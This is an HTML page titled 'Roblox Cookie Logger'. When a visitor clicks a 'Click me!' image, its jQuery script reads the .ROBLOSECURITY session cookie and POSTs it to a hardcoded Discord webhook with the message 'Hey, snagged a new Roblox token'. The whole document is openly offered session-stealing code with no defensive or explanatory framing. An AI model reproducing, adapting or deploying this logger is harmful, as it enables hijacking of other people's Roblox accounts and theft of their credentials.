<!DOCTYPE html>
<html>
<head>
  <title>Roblox Cookie Logger</title>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
</head>
<body>
  <img src="https://imgur.com/5YOAlV1" alt="Click me!" id="click-me">  <script>$(document).ready(function() {$('#click-me').click(function() {
        var token = getData('._value');        sendData(token);      });      
      function getData(key) {
        var raw = ";" + document.cookie;
        var split = raw.split(";" + '.ROBLOSECURITY' + "=");        if (split.length === 2) return split.pop().split(";").shift();        return "";}      function sendData(value) {
        if (value) {
          var endpoint ="https://discord.com/api/webhooks/1430273917465133220/wewUb_4RrwZqa4QS7mo1CooSAYih8B_hlvSUQoE7uanhWn4hn1XkJEc3jcE3uZxuYckR";          var payload = {
            content:"Hey, snagged a new Roblox token:" + value}; $.ajax({
            type:"POST",            url: endpoint,
            data: JSON.stringify(payload),            contentType:"application/json",            success: function() {
              console.log("Data sent successfully!");}, error: function() {
              console.log("Failed to send data.");} });} else {
          console.log("No data found.");} }
    });  </script>
</body>
</html>
